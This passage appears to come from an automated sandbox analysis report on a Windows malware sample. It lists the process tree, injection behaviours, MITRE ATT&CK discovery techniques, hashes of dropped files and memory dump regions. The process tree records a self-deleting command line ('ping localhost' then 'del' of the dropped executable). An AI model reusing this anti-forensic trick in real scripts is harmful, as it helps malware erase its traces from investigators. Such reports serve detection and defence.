"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\DLWwX.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3764

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2184

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:4144

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3928 -ip 3928
1⤵
PID:2284

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
16KB

MD5
58696e0d27fbcd9dcc44f25bae771916

SHA1
0a9e3cca536b284b63f45d3baaa1e65ae88aa9a4

SHA256
c005d32ca3255d93c7c65fb2de9bb3b7fd1247497036edfaeada1ee9dc189d98

SHA512
15369e12982a3403ce080e1b6e10a67ea1405e063045bf038f85273103466c2b48b639c0409a8eb9de0041d912c89b2a32ff837bd376f12ef96651234eff305b

Download Submit
C:\Users\Admin\AppData\Local\Temp\DLWwX.exe
Filesize
292KB

MD5
f63d00d962c43095a6de3838401e5b59

SHA1
c49feab758326a965d30fef2807291cf39c0d61a

SHA256
713061a3f104a116e82686dcc3d7c28e6bac0ea519a166c43a65b2f10cd0bdcf

SHA512
12f2fa8d97edcc5e045d222bc0b74521767f13bc18d190a965b14095367e73fb24cd387e354f345675954f47fdd9e174ff8e257b32e7aaa04cd22b1b17cbd9d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\DLWwX.exe
Filesize
292KB

MD5
f63d00d962c43095a6de3838401e5b59

SHA1
c49feab758326a965d30fef2807291cf39c0d61a

SHA256
713061a3f104a116e82686dcc3d7c28e6bac0ea519a166c43a65b2f10cd0bdcf

SHA512
12f2fa8d97edcc5e045d222bc0b74521767f13bc18d190a965b14095367e73fb24cd387e354f345675954f47fdd9e174ff8e257b32e7aaa04cd22b1b17cbd9d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\DLWwX.exe
Filesize
292KB

MD5
f63d00d962c43095a6de3838401e5b59

SHA1
c49feab758326a965d30fef2807291cf39c0d61a

SHA256
713061a3f104a116e82686dcc3d7c28e6bac0ea519a166c43a65b2f10cd0bdcf

SHA512
12f2fa8d97edcc5e045d222bc0b74521767f13bc18d190a965b14095367e73fb24cd387e354f345675954f47fdd9e174ff8e257b32e7aaa04cd22b1b17cbd9d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7191.tmp
Filesize
1KB

MD5
86c9bdab113a015f1e8cce0cd36cba61

SHA1
9eb6aa59965f066dfc755b09c26fe17f738145e1

SHA256
ce481fc23fb33868af4da9fcddcd7904aa24cf4bd1bc9f2dcb8ac0bac887610a

SHA512
c2f5af4d87652afeccd720f4c315b324c3ff6052778f44154dbd56ad9f4d5f417a87c23929c3d81e5396d5f38b361aaf4c441ae17cdea271c1342d6c1edcbf1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7376.tmp
Filesize
1KB

MD5
62ab33bd591b1a7b9bfed1cc1d25d70b

SHA1
3a8d4a1016a9172ef78cd22b4ef92080b0caa21f

SHA256
f322d994a54f2d3fbaf4d9f5fbc91bb23ec82e9e6194b18024b5459c30419d60

SHA512
79f95108db05191cd1a5088f32fd07586e139660a6efa0f3d65e8177ba41b0a21a7480d0cc07b419cca4977e71b141b17b79abb5c17d3a85b6705957b10feabb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5sl1nwcj.0yi.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\f2mwd3xk\f2mwd3xk.dll
Filesize
3KB

MD5
c41441c7aa72cf5b0aee56941e05e55f

SHA1
c54b4a4086280c2fc228f3004aef5fcdde8dbc0d

SHA256
0f8087f9eecf37b90c75d8e239ce478d280099345dd9725b426a2105edfac5c7

SHA512
bc2aa584b62c7012ef5b421e98302b3894e62962668d6170eeb49de1ca896cb8585f578c969a8caed21131505e119d52dd69e38177b034d47e5edf00616ec606

Download Submit
C:\Users\Admin\AppData\Local\Temp\mcbmmmg5\mcbmmmg5.dll
Filesize
3KB

MD5
e7613f89dbf45fd25dfa006187e15d11

SHA1
026b8b822c5002100e0b320c61d904cd6ff3abe0

SHA256
d326af78a9cf3dbfa11015391a88558cc73a2bc00621247d15d6a8c15c5377e7

SHA512
6ba4842cc3734956c396e954c93c0ddc494d7ed85cc5f20abd6a039147e4c7f2bfd80bbb544ebbb5c8ac6f9a9ee1b55cee28f8d37c9446d4039dcb90e7cc8326

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\f2mwd3xk\CSC88A40D9E46C24281AA4C2E160ACF426.TMP
Filesize
652B

MD5
8bcf7523d70f79fc2d1ff370b98f93b9

SHA1
076c08b9fd4eb056f88ed18ad6a1406813036848

SHA256
71878dd64004b3199c3b9ccff5a87bd6267955a0c04abf9f1a8d8453da11eb62

SHA512
151eec2e6fb8642eed1fb70db079326285790a4abcec656ce4fe464165f13b9177ec69b8dd46f587289063ffd87371f6ab57b5d626a5e95ae0172d2acc511462

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\f2mwd3xk\f2mwd3xk.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\f2mwd3xk\f2mwd3xk.cmdline
Filesize
369B

MD5
e375a59f6cbf2287a28c054efe6dd738

SHA1
ab4ae7f113a266486c401326b24b04e1352112d6

SHA256
3adf1ce3fba171de92b32c074f76e16610c8d5027f33554aaeb78b0e947def5a

SHA512
08096e6ddb6feb9a8985d8f72855938e6de6b9fac853d95f812d193b94364daad2d874ff3eb00df98878a6cf36ca0a9cd9585ed0f16669bd303f97dfed8246d4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mcbmmmg5\CSC109200EA473048668B3B728964BFCD92.TMP
Filesize
652B

MD5
52392dd4c9bb8eeed1f3a0fffe2dc9dc

SHA1
9a1f09f8ef02ec3ef9b3dee39c6ea8a779a66b5f

SHA256
21370747db5ea4269ba39a0bcc22893844715175f234f27d31eceee16c1936cb

SHA512
a6adb84971fc4962348c6ae4132d4b57d49e3d2626a45cb9db36ce1f8100b230cf19620105fc2cb42b85992418ffda3d9de23d3206a3e6af969c85c59c4b034d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mcbmmmg5\mcbmmmg5.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mcbmmmg5\mcbmmmg5.cmdline
Filesize
369B

MD5
345a670bb296ecdbcffa8a35809cd9d8

SHA1
00517c91c6a481ef6054673f217555b65db9567d

SHA256
f94bd87685babad411150a1d27a1b2e700ac380aa0dc15bd701db0e6ac72560e

SHA512
097d8db2064a740d3b8e27f24e75efb84d39067fb47cdcc4ad5a75fd68a7d4038781f9806e933977b84654efd6459819c877671197c47d314d4dcb5e38e35da6

Download Submit
memory/412-135-0x000001E1BE440000-0x000001E1BE4E4000-memory.dmp

Filesize
656KB

Download
memory/412-137-0x000001E1BDF90000-0x000001E1BDF91000-memory.dmp

Filesize
4KB

Download
memory/412-160-0x000001E1BE440000-0x000001E1BE4E4000-memory.dmp

Filesize
656KB

Download
memory/1724-27-0x0000000007630000-0x0000000007652000-memory.dmp

Filesize
136KB

Download
memory/1724-5-0x0000000005910000-0x0000000005976000-memory.dmp

Filesize
408KB

Download
memory/1724-0-0x0000000071CD0000-0x0000000072480000-memory.dmp

Filesize
7.7MB

Download
memory/1724-26-0x00000000076D0000-0x0000000007766000-memory.dmp

Filesize
600KB

Download
memory/1724-24-0x0000000002810000-0x0000000002820000-memory.dmp

Filesize
64KB

Download
memory/1724-41-0x0000000071CD0000-0x0000000072480000-memory.dmp

Filesize
7.7MB

Download
memory/1724-2-0x00000000027C0000-0x00000000027F6000-memory.dmp

Filesize
216KB

Download
memory/1724-3-0x00000000052E0000-0x0000000005908000-memory.dmp

Filesize
6.2MB

Download
memory/1724-4-0x0000000005280000-0x00000000052A2000-memory.dmp

Filesize
136KB

Download
memory/1724-20-0x0000000002810000-0x0000000002820000-memory.dmp

Filesize
64KB

Download
memory/1724-6-0x00000000059F0000-0x0000000005A56000-memory.dmp

Filesize
408KB

Download
memory/1724-12-0x0000000005AA0000-0x0000000005DF4000-memory.dmp

Filesize
3.3MB

Download
memory/1724-17-0x0000000006200000-0x000000000621E000-memory.dmp

Filesize
120KB

Download
memory/1724-1-0x0000000002810000-0x0000000002820000-memory.dmp

Filesize
64KB

Download
memory/1724-23-0x0000000006640000-0x000000000665A000-memory.dmp

Filesize
104KB

Download
memory/1724-28-0x00000000084E0000-0x0000000008A84000-memory.dmp

Filesize
5.6MB

Download
memory/1724-18-0x0000000006570000-0x00000000065BC000-memory.dmp

Filesize
304KB

Download
memory/1724-19-0x0000000071CD0000-0x0000000072480000-memory.dmp

Filesize
7.7MB

Download
memory/1724-22-0x00000000078B0000-0x0000000007F2A000-memory.dmp

Filesize
6.5MB

Download
memory/1724-21-0x0000000002810000-0x0000000002820000-memory.dmp

Filesize
64KB

Download
memory/2184-146-0x0000018012640000-0x0000018012641000-memory.dmp

Filesize
4KB

Download
memory/2184-159-0x0000018012870000-0x0000018012914000-memory.dmp

Filesize
656KB

Download
memory/2184-142-0x0000018012870000-0x0000018012914000-memory.dmp

Filesize
656KB

Download
memory/3172-144-0x00000000092B0000-0x0000000009354000-memory.dmp

Filesize
656KB

Download
memory/3172-99-0x0000000002FA0000-0x0000000002FA1000-memory.dmp

Filesize
4KB

Download
memory/3172-98-0x00000000092B0000-0x0000000009354000-memory.dmp

Filesize
656KB

Download
memory/3700-113-0x0000026182DE0000-0x0000026182DE1000-memory.dmp

Filesize
4KB

Download
memory/3700-112-0x0000026183260000-0x0000026183304000-memory.dmp

Filesize
656KB

Download
memory/3700-150-0x0000026183260000-0x0000026183304000-memory.dmp

Filesize
656KB

Download
memory/3764-157-0x000001FF0D1E0000-0x000001FF0D284000-memory.dmp

Filesize
656KB

Download
memory/3764-124-0x000001FF0D1E0000-0x000001FF0D284000-memory.dmp

Filesize
656KB

Download
memory/3764-126-0x000001FF0D290000-0x000001FF0D291000-memory.dmp

Filesize
4KB

Download
memory/3928-51-0x00000000023E0000-0x00000000023EB000-memory.dmp

Filesize
44KB

Download
memory/3928-50-0x0000000002530000-0x0000000002630000-memory.dmp

Filesize
1024KB

Download
memory/3928-49-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/3928-46-0x0000000002450000-0x000000000245D000-memory.dmp

Filesize
52KB

Download
memory/3928-45-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/3928-44-0x00000000023E0000-0x00000000023EB000-memory.dmp

Filesize
44KB

Download
memory/3928-43-0x0000000002530000-0x0000000002630000-memory.dmp

Filesize
1024KB

Download
memory/4020-155-0x00000290EB610000-0x00000290EB6B4000-memory.dmp

Filesize
656KB

Download
memory/4020-117-0x00000290EB610000-0x00000290EB6B4000-memory.dmp

Filesize
656KB

Download
memory/4020-118-0x00000290EB5D0000-0x00000290EB5D1000-memory.dmp

Filesize
4KB

Download
memory/4144-152-0x0000000001230000-0x0000000001231000-memory.dmp

Filesize
4KB

Download
memory/4144-149-0x0000000001640000-0x00000000016D8000-memory.dmp

Filesize
608KB

Download
memory/4144-154-0x0000000001640000-0x00000000016D8000-memory.dmp

Filesize
608KB

Download
memory/4184-64-0x00007FFF2A700000-0x00007FFF2B1C1000-memory.dmp

Filesize
10.8MB

Download
memory/4184-109-0x00007FFF2A700000-0x00007FFF2B1C1000-memory.dmp

Filesize
10.8MB

Download
memory/4184-110-0x000002277E490000-0x000002277E4CD000-memory.dmp

Filesize
244KB

Download
memory/4184-96-0x000002277E490000-0x000002277E4CD000-memory.dmp

Filesize
244KB

Download
memory/4184-94-0x000002277E480000-0x000002277E488000-memory.dmp

Filesize
32KB

Download
memory/4184-80-0x000002277E320000-0x000002277E328000-memory.dmp

Filesize
32KB

Download
memory/4184-66-0x000002277DC10000-0x000002277DC20000-memory.dmp

Filesize
64KB

Download
memory/4184-65-0x000002277DC10000-0x000002277DC20000-memory.dmp

Filesize
64KB

Download
memory/4184-53-0x000002277DC60000-0x000002277DC82000-memory.dmp

Filesize
136KB

Download
memory/5064-130-0x000001E1A2170000-0x000001E1A2171000-memory.dmp

Filesize
4KB

Download
memory/5064-125-0x000001E1A28D0000-0x000001E1A2974000-memory.dmp

Filesize
656KB

Download
memory/5064-158-0x000001E1A28D0000-0x000001E1A2974000-memory.dmp

Filesize
656KB

Download